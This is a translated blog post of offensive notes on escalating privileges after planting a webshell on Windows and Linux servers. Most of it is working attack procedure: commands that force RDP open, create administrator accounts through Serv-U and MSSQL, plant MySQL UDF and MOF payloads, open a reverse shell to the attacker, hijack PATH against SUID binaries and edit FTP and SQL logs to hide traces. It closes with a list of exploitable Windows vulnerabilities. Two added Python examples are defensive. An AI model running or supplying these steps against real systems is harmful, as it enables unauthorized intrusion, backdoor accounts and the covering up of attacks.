Network Security (8): Privilege Escalation

If you do not know the password of a webshell (大马, a full-featured web shell), try appending ?profile=a to its URL; this does not always work:
http://1.11.1.1:8000/2.asp?profile=a

Windows
    User (ordinary user)
    Administrator
    System (full control)
The three are not strictly nested: Administrator contains everything User can do, while System only partly overlaps with the other two.
Linux
    User
    root

Why privilege escalation is needed

When testing a website, a webshell only gives you the permissions of the web server process. Those permissions are usually not enough to change what you need on the server, so you escalate.

Typical script execution permissions (default deployments):
ASP / PHP: anonymous / low-privilege web-server account
ASPX: user-level privileges (application pool identity)
JSP: usually system privileges (the servlet container service is often installed to run as SYSTEM or root)

Another reason to escalate:
You want to compromise site A, but A is well protected, while site B on the same server has vulnerabilities. Compromise B, escalate privileges on the server, and cross over to A.


If 3389 (RDP) is reachable, simply create a new user and log in over RDP.

Forcing 3389 (RDP) open:
1. Upload a webshell, get a shell through a Chopper (China Chopper) connection, and in its virtual terminal / SQL interface execute:
exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
The command needs elevated database privileges (xp_regwrite is restricted to sysadmin / sa). Developers rarely disable this part, so it is very easy to use.

2. Open Notepad and write the following:
echo [Components]>c:\sql
echo TSEnable=on>>c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
Save it as a .bat file, upload it to the compromised host, and run it.
Note: confirm that the winnt directory is really on drive C:; if Windows is installed on another drive, adjust the path.

Closing 3389 again:
exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;--

Windows privilege escalation:
Connect to the webshell and operate from within it.
Privilege escalation through third-party software:
FTP:
Serv-U
1. You have edit permission on the configuration
Check whether ServUDaemon.ini in the Serv-U default installation directory is writable.
Add a user: follow the format of the existing entries in the configuration file and add one.
Note that the Password field is salted. First look at what the salt is: two characters of salt are prepended to the clear-text password, the result is MD5-hashed, and the value written to the file is the same two salt characters followed by the hex digest.
Example from these notes: MD5("gw123") -> fb289605d3e6ba84fecb32b0aa2f83cb, so with salt "gw" and password "123" the value to put in the Password field is gwfb289605d3e6ba84fecb32b0aa2f83cb.
Connect to the FTP server as that user and execute commands through SITE EXEC:
quote site exec net user cracer cracer.com /add              (create a user with that password)
quote site exec net localgroup administrators cracer /add    (add the user to the Administrators group)

2. No modify permission
The only option is to brute-force the password hashes (salted MD5, as above).

3. Overflow (exploit) escalation
The webshell has a privilege-escalation option; run it, then net user dkill 123 /add to add a user with a password, and you are done.

4. The administrator password has been changed
If the Serv-U administrator password is changed after you created your user, and Serv-U is what you rely on for escalation, locate ServUAdmin.exe and download it.
Open it in C32 (the hex editor used for code auditing) by dragging the .exe in and viewing it in hexadecimal.
Search the ANSI strings for the administrator account name; the password is found alongside it.

G6FTP:
Download the management configuration file and crack the administrator password.
The management port only accepts connections from the local machine by default, so forward it with lcx:
lcx.exe -tran 8027 127.0.0.1 8021
Log in with the G6FTP client as the administrator user.
Create a user, set its permissions, and set the batch file it is allowed to execute.
Upload the batch file.
Log in to FTP as the newly created ordinary user.
Run the command: quote site x.bat
x.bat contains the commands that add a system user, which is the escalation.
FileZilla

Remote management software:
pcAnywhere / Radmin / VNC

Overflow (exploit) escalation

Startup-item escalation

Escalation with pr
pr.exe has to be uploaded to a writable directory such as the recycle-bin directory or the site root, so first locate such a directory from the webshell, e.g.
c:\recycle\pr.exe
Upload pr and run it to escalate, then upload a hash-cracking tool.

Database privilege escalation
MSSQL escalation:
install / enable the required components (xp_cmdshell and the like)
obtain the sa account by reading config.asp, conn.asp and similar files
open 3389
create a user
add it to the Administrators group
done
MySQL database privilege escalation

Escalation through environment variables (this is a Linux PATH hijack against a SUID binary rather than a MySQL technique; it is recorded here as in the original notes):
Look for SUID files on the file system:
$ find / -perm -u=s -type f 2>/dev/null
Use the file command to see what an interesting result is (msgmike is one of the files the search found):
$ file msgmike
It is an executable, so run it:
$ ./msgmike
It invokes cat by bare name, so cat is resolved through $PATH. Create a fake cat that spawns a shell, make it executable, put the current directory first in PATH, and run the SUID binary again:
$ touch cat
$ echo "/bin/sh" > cat
$ chmod +x cat
$ export PATH='.'        (or PATH=.:$PATH to keep the rest of the environment usable)
$ ./msgmike
The shell is now running with the privileges of the SUID binary's owner: privilege escalation.
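The PATH hijack from the msgmike steps above, as an added example that is not code from the original notes (msgmike itself is not included): a planted cat placed first in PATH is picked up by a command that calls cat by bare name, while an absolute path or a sanitized PATH defeats it. `sh -c` stands in for the SUID program calling system("cat ..."), which is an assumption about how msgmike works, and the planted cat exits with status 42 instead of spawning a shell so the outcome can be checked.

```python
import os
import stat
import subprocess
import tempfile

# Stand-ins for what the SUID binary executes (constructed for this demo).
VULNERABLE_COMMAND = "cat /dev/null"      # bare name: resolved through $PATH
HARDENED_COMMAND = "/bin/cat /dev/null"   # absolute path: $PATH is irrelevant
TRUSTED_PATH = "/usr/bin:/bin"            # what a careful SUID program resets PATH to


def run_with_planted_cat(command: str, sanitize_path: bool = False) -> int:
    """Run `command` with a planted `cat` first in PATH; return the exit status.

    Mirrors the notes (touch cat; echo ... > cat; chmod +x cat;
    export PATH=.:$PATH; ./msgmike) with a temporary directory playing the
    role of ".".  The planted cat exits 42 instead of running /bin/sh, so a
    return value of 42 means the hijack worked and 0 means it did not.
    With sanitize_path=True the child gets TRUSTED_PATH instead, which is the
    defensive counterpart: the planted directory is simply never searched.
    """
    with tempfile.TemporaryDirectory() as workdir:
        planted = os.path.join(workdir, "cat")
        with open(planted, "w") as f:
            f.write("#!/bin/sh\nexit 42\n")      # a real attack writes "/bin/sh" here
        mode = os.stat(planted).st_mode
        os.chmod(planted, mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)  # chmod +x cat

        env = dict(os.environ)
        if sanitize_path:
            env["PATH"] = TRUSTED_PATH
        else:
            env["PATH"] = workdir + os.pathsep + env.get("PATH", TRUSTED_PATH)  # export PATH=.:$PATH

        # sh -c plays the SUID program that calls system("cat ...")
        return subprocess.run(["sh", "-c", command], env=env).returncode


if __name__ == "__main__":
    print("bare name, attacker PATH :", run_with_planted_cat(VULNERABLE_COMMAND))
    print("absolute path            :", run_with_planted_cat(HARDENED_COMMAND))
    print("bare name, sanitized PATH:", run_with_planted_cat(VULNERABLE_COMMAND, sanitize_path=True))
```

The two fixes shown are the ones to look for when auditing a SUID program: either every external program is invoked by absolute path, or the program resets PATH (and the rest of the environment) before calling system()/popen(); a bare name with an inherited PATH is the bug.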

UDF escalation
Obtain the root account and password of the target's MySQL database:
1. Read the database configuration file in the site source (look in inc, conn, config.sql, common, data).
2. Read user.MYD under the MySQL data directory (/data/mysql/).
3. Brute-force the MySQL password over port 3306.
	***************************************************************************************
Once you know the database user name and password:
Use the testa.php webshell.
Run uname -r to get the kernel version and whether the system is 32- or 64-bit.
Pick the matching version of the UDF library from udf.txt.
Paste it into the webshell's MySQL statement execution to write the library.
If the plugin directory is not writable, set it beforehand: chmod 777 -R /usr/lib/mysql/plugin/
Then create a function from the imported library file:
create function sys_eval returns string soname "mysqludf.so";
Execute commands:
select sys_eval('whoami');
	*********************************************************************************
Enable remote connections to the database
Command to execute:
grant all privileges on *.* to 'root'@'%' identified by 'root' with grant option;
Then use a MySQL privilege-escalation tool.
		
How UDF escalation works:
With root database privileges, export udf.dll into a system directory; the functions in the DLL can then be called from SQL to execute cmd.
MySQL 5.1 and later: the library must go into lib\plugin\ under the MySQL installation directory.
Earlier versions: c:\winnt\udf.dll on Windows 2000, c:\windows\udf.dll on Windows 2003.


MOF escalation (very powerful):
1. Upload mof.php, enter the database login account and password, send the command, and it escalates.

2. Or upload x.mof through the webshell and use a select statement in the webshell to write it to the right location (the WMI service compiles any .mof dropped into wbem\mof\ as SYSTEM):
select load_file('c:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
Enable remote database connections:
grant all privileges on *.* to 'root'@'%' identified by 'cc4789.com' with grant option;

Reverse-port (bounce) escalation:
1. Connect to the MySQL server with the mysql client tool, then run:
mysql.exe -h 172.16.10.11 -uroot -p
Enter password:
mysql> \. c:\mysql.txt
mysql> select backshell("YourIP",2010);
(mysql.txt defines the backshell UDF; it connects back to YourIP on port 2010, so have a listener waiting there first.)

Removing (disabling) the xp_cmdshell component:
EXEC sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell', 0
GO
RECONFIGURE
GO

Linux privilege escalation:
uname -r shows the kernel version.
Then find a matching Linux privilege-escalation exploit (EXP).
After uploading the exploit, move it to a writable directory such as /tmp:
cp /var/www/html/ac /tmp/ac
Linux escalation with a reverse connection back to yourself:
nc -lvnp 12345 on your own machine, then trigger the connection.
In your own window compile it:
gcc ac.c        (gcc writes the binary to a.out by default)
Run it: ./a.out


Which users are in the Administrators group?

net localgroup administrators

Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Are there network connections to other hosts?

netstat -ano

Is the firewall turned on? If so, how is it configured?

netsh firewall show state

netsh firewall show config

netsh advfirewall firewall show rule name=all

netsh advfirewall export "firewall.txt"

Where are the IIS log files?

C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log

C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log

C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log

C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log
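A parser for the u_ex[YYMMDD].log files listed above, as an added example that is not part of the original notes: it reads the W3C #Fields header, turns each record into a dict keyed by field name, and flags the traffic pattern the steps on this page produce (repeated POSTs from one client to an uploaded .asp/.php/.jsp script, and the ?profile=a parameter from the top of the page). The log lines are constructed for the example; the hosts, paths and timestamps in them are invented.

```python
import re
from typing import Iterator

# Constructed u_ex log sample in IIS W3C extended format (invented hosts and paths).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Date: 2019-07-29 10:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2019-07-29 10:00:01 10.0.0.5 GET /index.asp - 80 - 203.0.113.7 Mozilla/5.0 200 0 0 15
2019-07-29 10:00:05 10.0.0.5 POST /upload/2.asp - 80 - 203.0.113.7 Mozilla/5.0 200 0 0 120
2019-07-29 10:00:06 10.0.0.5 POST /upload/2.asp - 80 - 203.0.113.7 Mozilla/5.0 200 0 0 95
2019-07-29 10:00:07 10.0.0.5 POST /upload/2.asp - 80 - 203.0.113.7 Mozilla/5.0 200 0 0 88
2019-07-29 10:00:09 10.0.0.5 GET /2.asp profile=a 8000 - 203.0.113.7 Mozilla/5.0 200 0 0 20
2019-07-29 10:01:00 10.0.0.5 GET /images/logo.png - 80 - 198.51.100.2 Mozilla/5.0 200 0 0 3
"""

SCRIPT_EXT = re.compile(r"\.(asp|aspx|php|jsp)$", re.IGNORECASE)


def parse_w3c(log_text: str) -> Iterator[dict]:
    """Yield one dict per record; field names come from the #Fields directive.

    IIS writes a new #Fields line whenever the logged field set changes, so the
    header is re-read every time it appears rather than assumed fixed.
    """
    fields = None
    for line in log_text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            raise ValueError("log record appears before any #Fields header")
        values = line.split(" ")
        if len(values) != len(fields):
            continue                      # truncated or corrupt line: skip, do not mis-align
        yield dict(zip(fields, values))


def suspicious_requests(log_text: str, post_threshold: int = 3) -> list:
    """Return (client_ip, uri_stem, reason) for requests that look like webshell use."""
    findings = []
    post_counts = {}
    for rec in parse_w3c(log_text):
        stem, query, ip = rec["cs-uri-stem"], rec["cs-uri-query"], rec["c-ip"]
        if not SCRIPT_EXT.search(stem):
            continue                      # static content never carries a shell
        if rec["cs-method"] == "POST":
            key = (ip, stem)
            post_counts[key] = post_counts.get(key, 0) + 1
            if post_counts[key] == post_threshold:   # report once, when the threshold is reached
                findings.append((ip, stem, f"{post_threshold}+ POSTs to one script from one client"))
        if "profile=" in query:
            findings.append((ip, stem, "profile= parameter on a script (webshell backdoor login)"))
    return findings


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Chopper-style shells send every command as a POST to the same script with a browser-like User-Agent, so the per-client POST count on script URIs is the cheapest signal in these logs; tune post_threshold against normal form traffic before relying on it.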

Is XAMPP, Apache or PHP installed? Where are the XAMPP, Apache or PHP configuration files?

dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf

Get-Childitem -Path C:\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction SilentlyContinue

Are there any Apache web logs on the system?

dir /s access.log error.log

Get-Childitem -Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue

Are there any interesting files on the file system, for example in the user directories (Desktop, Documents, etc.)?

dir /s *pass* == *vnc* == *.config* 2>nul

Get-Childitem -Path C:\Users\ -Include *password*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue

Dealing with the MS FTP server logs:

In C:\WINNT\system32\LogFiles\MSFTPSVC1\ there are, say, three files: ex011120.log, ex011121.log and ex011124.log. Deleting ex011124.log fails with "... the file is in use".

You can simply delete ex011120.log and ex011121.log. Then open ex011124.log in Notepad, remove the entries that concern you, save, and overwrite the file; that succeeds.

Once the MSFTPSVC service is stopped, ex011124.log can be deleted as well.

Clearing the MSSQL Query Analyzer connection history:

For MSSQL 2000 it is kept in the registry at:

HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers

Find the entries there and delete them.

For MSSQL 2005 it is in:

C:\Documents and Settings\<username>\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat

Collection of common relative paths of site configuration files. Try each file name below with the prefixes /, ./, ../, ../../ and ../../../ (e.g. /conn.php, ./conn.php, ../conn.php, ../../conn.php, ../../../conn.php):

config.php
config.inc.php
conn.php
conn.asp
config/config.php
config/config.inc.php
config/conn.php
config/conn.asp
data/config.php
data/config.inc.php
data/conn.php
data/conn.asp
include/config.php
include/config.inc.php
include/conn.php
include/conn.asp
inc/config.php
inc/config.inc.php
inc/conn.php
inc/conn.asp
index.php
index.asp

Collection of Windows privilege-escalation vulnerabilities (summarized from experienced researchers' write-ups)

Vulnerability list

Security bulletin [KB] [component / description] (affected operating systems)

CVE-2017-0213 [Windows COM elevation of privilege] (Windows 10 / 8.1 / 7 / 2016 / 2012 / 2008)
MS17-010 [KB4013389] [SMBv1 server, remote code execution (EternalBlue)] (Windows 7 / 2008 / 2003 / XP)
MS16-135 [KB3199135] [Windows kernel-mode driver] (2016)
MS16-098 [KB3178466] [kernel driver] (Win 8.1)
MS16-075 [KB3164038] [Hot Potato] (2003 / 2008 / 7 / 8 / 2012)
MS16-032 [KB3143141] [Secondary Logon service] (2008 / 7 / 8 / 10 / 2012)
MS16-016 [KB3136041] [WebDAV] (2008 / Vista / 7)
MS15-097 [KB3089656] [graphics component, remote code execution] (Win 8.1 / 2012)
MS15-076 [KB3067505] [RPC] (2003 / 2008 / 7 / 8 / 2012)
MS15-077 [KB3077657] [ATMFD (Adobe Type Manager font driver)] (XP / Vista / Win7 / Win8 / 2000 / 2003 / 2008 / 2012)
MS15-061 [KB3057839] [kernel driver] (2003 / 2008 / 7 / 8 / 2012)
MS15-051 [KB3057191] [Windows kernel-mode driver] (2003 / 2008 / 7 / 8 / 2012)
MS15-010 [KB3036220] [kernel driver] (2003 / 2008 / 7 / 8)
MS15-015 [KB3031432] [kernel driver] (Win7 / 8 / 8.1 / 2012 / RT / 2012 R2 / 2008 R2)
MS15-001 [KB3023266] [kernel driver] (2008 / 2012 / 7 / 8)
MS14-070 [KB2989935] [kernel driver] (2003)
MS14-068 [KB3011780] [domain privilege escalation (Kerberos KDC)] (2003 / 2008 / 2012 / 7 / 8)
MS14-058 [KB3000061] [win32k.sys] (2003 / 2008 / 2012 / 7 / 8)
MS14-040 [KB2975684] [AFD driver] (2003 / 2008 / 2012 / 7 / 8)
MS14-002 [KB2914368] [NDProxy] (2003 / XP)
MS13-053 [KB2850851] [win32k.sys] (XP / Vista / 2003 / 2008 / Win7)
MS13-046 [KB2840221] [dxgkrnl.sys] (Vista / 2003 / 2008 / 2012 / 7)
MS13-005 [KB2778930] [kernel-mode driver] (2003 / 2008 / 2012 / Win7 / 8)
MS12-042 [KB2711167] [Windows kernel (user-mode scheduler / SYSRET)] (XP / 2003 / 7 / 2008 R2)
MS12-020 [KB2671387] [RDP] (2003 / 2008 / 7 / XP)
MS11-080 [KB2592799] [AFD.sys] (2003 / XP)
MS11-062 [KB2566454] [NDISTAPI] (2003 / XP)
MS11-046 [KB2503665] [AFD.sys] (2003 / 2008 / 7 / XP)
MS11-011 [KB2393802] [kernel driver] (2003 / 2008 / 7 / XP / Vista)
MS10-092 [KB2305420] [Task Scheduler] (2008 / 7)
MS10-065 [KB2267960] [FastCGI] (IIS 5.1, 6.0, 7.0 and 7.5)
MS10-059 [KB982799] [ACL (Churraskito)] (2008 / 7 / Vista)
MS10-048 [KB2160329] [win32k.sys] (XP SP2 and SP3 / 2003 SP2 / Vista SP1 and SP2 / 2008 Gold, SP2 and R2 / Win7)
MS10-015 [KB977165] [KiTrap0D] (2003 / 2008 / 7 / XP)
MS09-050 [KB975517] [SMBv2, remote code execution] (2008 / Vista)
MS09-020 [KB970483] [IIS 6.0 WebDAV] (IIS 5.1 and 6.0)
MS09-012 [KB959454] [Chimichurri] (Vista / Win7 / 2008)
MS08-068 [KB957097] [SMB, remote code execution] (2000 / XP)
MS08-067 [KB958644] [Server service, remote code execution] (Windows 2000 / XP / Server 2003 / Vista / Server 2008)
MS08-025 [KB941693] [win32k.sys] (XP / 2003 / 2008 / Vista)
MS06-040 [KB921883] [Server service, remote code execution] (2003 / XP / 2000)
MS05-039 [KB899588] [PnP service] (Win 9X / ME / NT / 2000 / XP / 2003)
MS03-026 [KB823980] [RPC interface buffer overrun] (NT / 2000 / XP / 2003)

Download the exploit collection: https://github.com/SecWiki/windows-kernel-exploits


Source: blog.csdn.net/Aidang/article/details/97748746